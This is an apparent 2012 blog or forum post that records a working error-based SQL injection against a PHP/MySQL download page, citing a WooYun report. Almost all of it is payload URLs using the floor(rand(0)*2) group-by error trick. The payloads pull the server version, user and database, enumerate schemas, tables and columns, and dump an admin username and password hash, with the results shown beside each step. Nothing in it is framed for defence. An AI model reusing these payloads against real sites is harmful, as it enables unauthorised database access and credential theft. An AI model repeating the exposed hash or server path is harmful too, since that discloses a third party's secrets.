
PHP+MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I'd been looking for one to test before and didn't expect to find it here; just testing it and keeping a record.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********enumerate databases one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********enumerate table names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********enumerate column names one by one with limit**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
